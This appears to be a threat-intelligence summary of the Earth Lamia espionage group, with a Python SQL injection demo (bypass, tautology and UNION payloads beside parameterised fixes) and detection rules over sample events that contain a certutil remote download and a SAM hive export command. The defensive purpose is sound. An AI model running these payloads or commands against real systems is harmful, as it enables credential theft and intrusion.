Earth Lamia, a suspected China-nexus APT group active since at least 2023, has expanded its cyber espionage campaigns across Brazil, India, and Southeast Asia. Its targeting has shifted over time: from financial services, to logistics and online retail, and most recently to IT, government, and academic institutions. Earth Lamia exploits vulnerable web applications for initial access, develops custom malware to evade detection, and relies on well-established lateral movement and data exfiltration techniques once inside a network.
Earth Lamia gains initial access primarily through SQL injection against public-facing web applications, and also exploits a range of known vulnerabilities in such applications, including but not limited to:
- CVE-2017-9805 (Apache Struts2)
- CVE-2021-22205 (GitLab)
- CVE-2024-9047 (WordPress File Upload plugin)
- CVE-2024-27198 and CVE-2024-27199 (JetBrains TeamCity)
- CVE-2024-51378 and CVE-2024-51567 (CyberPanel)
- CVE-2024-56145 (Craft CMS)
- CVE-2025-31324 (SAP NetWeaver)
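Since SQL injection is the group's primary way in, the following added example (written for this page, not code from the report or from any affected product) shows the two injection patterns that matter most against a login or lookup endpoint, beside the parameterised form that defeats them. The table, rows, credentials and payload strings are constructed for the demonstration and run against an in-memory SQLite database.

```python
import sqlite3

# Constructed in-memory user store standing in for a public-facing web app's
# database; the table, rows and credentials are invented for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, email TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!', 'admin@example.invalid')")
    conn.execute("INSERT INTO users VALUES ('alice', 'hunter2', 'alice@example.invalid')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # Untrusted input is spliced into the SQL text, so quote characters,
    # comment markers and boolean tautologies in the input become SQL.
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0

def login_hardened(conn, username, password):
    # Parameterised query: the driver binds the values as data; the statement
    # structure is fixed before any input is seen.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0

def email_vulnerable(conn, username):
    # A read-only lookup is just as dangerous: a UNION appended to the input
    # turns it into a primitive for reading any column of any table.
    sql = f"SELECT email FROM users WHERE username = '{username}'"
    return [r[0] for r in conn.execute(sql).fetchall()]

def email_hardened(conn, username):
    sql = "SELECT email FROM users WHERE username = ?"
    return [r[0] for r in conn.execute(sql, (username,)).fetchall()]

def demo():
    conn = make_db()
    # Comment-based bypass: closes the username literal and comments out the
    # password predicate, so any password is accepted for 'admin'.
    bypass_user = "admin'--"
    # Tautology in the password field: AND binds tighter than OR, so the
    # WHERE clause collapses to "... OR '1'='1'".
    taut_pw = "' OR '1'='1"
    # UNION-based exfiltration through the email column.
    union_user = "nobody' UNION SELECT password FROM users--"
    return {
        "vuln_comment_bypass": login_vulnerable(conn, bypass_user, "wrong"),
        "hard_comment_bypass": login_hardened(conn, bypass_user, "wrong"),
        "vuln_tautology": login_vulnerable(conn, "x", taut_pw),
        "hard_tautology": login_hardened(conn, "x", taut_pw),
        "vuln_union": email_vulnerable(conn, union_user),
        "hard_union": email_hardened(conn, union_user),
        "legit": login_hardened(conn, "admin", "S3cret!"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The hardened functions are not "input validation"; they change how the query is built, which is the only fix that holds regardless of what the attacker types. The same parameter-binding discipline applies to whatever framework or ORM the real application uses.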
Once inside, the group dumps credentials from LSASS memory and the SAM hive, scans and pivots through the network (Fscan for internal port scanning, certutil.exe and powershell.exe to download tooling, and the rakshasa proxy for tunnelling), and establishes persistence through scheduled tasks and newly created administrator accounts. Custom privilege escalation tools (for example BypassBoss, based on Sharp4PrinterNotifyPotato) and DLL sideloading, in which a malicious DLL is loaded by a trusted signed executable such as AppLaunch.exe, let the malware run under a legitimate process name.
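Each post-exploitation step above leaves a distinct host artefact. The following added example (written for this page, not code from the report or from any vendor product) runs a small set of detection rules over constructed Sysmon and Windows Security events covering the LOLBin download, LSASS access, SAM hive export, account creation followed by local-admin group membership, scheduled-task creation, and sideloading into AppLaunch.exe. Event field names follow the usual Sysmon/Security schema; the hosts, paths, user names and IP address are invented, and the SIDELOAD_HOSTS set is an assumption to be extended for your own estate.

```python
import re

# Constructed sample telemetry (Sysmon and Security events flattened to dicts).
SAMPLE_EVENTS = [
    {"src": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.7/fscan.exe C:\\Users\\Public\\fscan.exe"},
    {"src": "Sysmon", "EventID": 10, "SourceImage": r"C:\Users\Public\dump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"src": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": "reg save HKLM\\SAM C:\\Users\\Public\\sam.hiv"},
    {"src": "Security", "EventID": 4720, "TargetUserName": "svc_backup"},
    {"src": "Security", "EventID": 4732, "TargetSid": "S-1-5-32-544", "MemberName": "svc_backup"},
    {"src": "Security", "EventID": 4698, "SubjectUserName": "svc_backup", "TaskName": r"\Microsoft\Windows\Updater"},
    {"src": "Sysmon", "EventID": 7, "Image": r"C:\Users\Public\AppLaunch.exe",
     "ImageLoaded": r"C:\Users\Public\mscoree.dll", "Signed": "false"},
    {"src": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},  # benign control event
]

def _base(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

LOLBIN_DOWNLOAD = {
    "certutil.exe": re.compile(r"-urlcache\b.*https?://", re.I),
    "powershell.exe": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I),
}
PROCESS_VM_READ = 0x0010                 # needed to read credential material out of LSASS
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")
SIDELOAD_HOSTS = {"applaunch.exe"}       # assumption: extend with other signed hosts you track
LOCAL_ADMINS_SID = "S-1-5-32-544"

def rule_lolbin_download(e):
    if e["src"] == "Sysmon" and e["EventID"] == 1:
        pat = LOLBIN_DOWNLOAD.get(_base(e["Image"]))
        if pat and pat.search(e["CommandLine"]):
            return f"{_base(e['Image'])} fetching remote content: {e['CommandLine']}"

def rule_lsass_access(e):
    if e["src"] == "Sysmon" and e["EventID"] == 10 and _base(e["TargetImage"]) == "lsass.exe":
        if int(e["GrantedAccess"], 16) & PROCESS_VM_READ:
            return f"{e['SourceImage']} opened lsass.exe with access {e['GrantedAccess']}"

def rule_sam_hive_dump(e):
    if e["src"] == "Sysmon" and e["EventID"] == 1 and _base(e["Image"]) == "reg.exe":
        cl = e["CommandLine"].lower()
        if " save " in cl and re.search(r"hklm\\(sam|security|system)\b", cl):
            return f"registry hive export: {e['CommandLine']}"

def rule_scheduled_task(e):
    if e["src"] == "Security" and e["EventID"] == 4698:
        return f"scheduled task {e['TaskName']} created by {e['SubjectUserName']}"
    if (e["src"] == "Sysmon" and e["EventID"] == 1 and _base(e["Image"]) == "schtasks.exe"
            and "/create" in e["CommandLine"].lower()):
        return f"schtasks /create: {e['CommandLine']}"

def rule_dll_sideload(e):
    if e["src"] == "Sysmon" and e["EventID"] == 7 and _base(e["Image"]) in SIDELOAD_HOSTS:
        dll = e["ImageLoaded"].lower()
        if not dll.startswith(SYSTEM_DIRS) and e.get("Signed", "").lower() != "true":
            return f"{e['Image']} loaded unsigned non-system DLL {e['ImageLoaded']}"

RULES = [("lolbin_download", rule_lolbin_download), ("lsass_access", rule_lsass_access),
         ("sam_hive_dump", rule_sam_hive_dump), ("scheduled_task", rule_scheduled_task),
         ("dll_sideload", rule_dll_sideload)]

def detect(events):
    """Return (rule_name, detail) alerts; the admin-account rule is stateful
    because 4720 (account created) and 4732 (added to group) are separate events."""
    alerts, created = [], set()
    for e in events:
        if e["src"] == "Security" and e["EventID"] == 4720:
            created.add(e["TargetUserName"].lower())
        elif (e["src"] == "Security" and e["EventID"] == 4732
              and e["TargetSid"] == LOCAL_ADMINS_SID and e["MemberName"].lower() in created):
            alerts.append(("new_local_admin",
                           f"newly created account {e['MemberName']} added to local Administrators"))
        for name, rule in RULES:
            hit = rule(e)
            if hit:
                alerts.append((name, hit))
    return alerts

if __name__ == "__main__":
    for name, detail in detect(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

The LSASS rule keys on PROCESS_VM_READ rather than the exact 0x1010 mask because dumpers vary the rights they request; in production, allow-list the EDR and backup agents that legitimately open LSASS, and treat the scheduled-task rule as an enrichment signal rather than a stand-alone alert, since it fires on routine administration too.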
The group deploys several backdoors, including Vshell, Brute Ratel, and a modular .NET-based backdoor named PULSEPACK. The latest PULSEPACK variant communicates with its C2 server over WebSocket, loads plugins at runtime that are delivered Base64-encoded and encrypted, and AES-encrypts the data it transmits, all of which points to ongoing development of the tool.